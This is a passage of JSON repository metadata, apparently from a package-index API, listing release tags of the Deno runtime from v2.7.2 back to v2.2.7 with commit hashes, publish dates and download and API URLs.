commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://g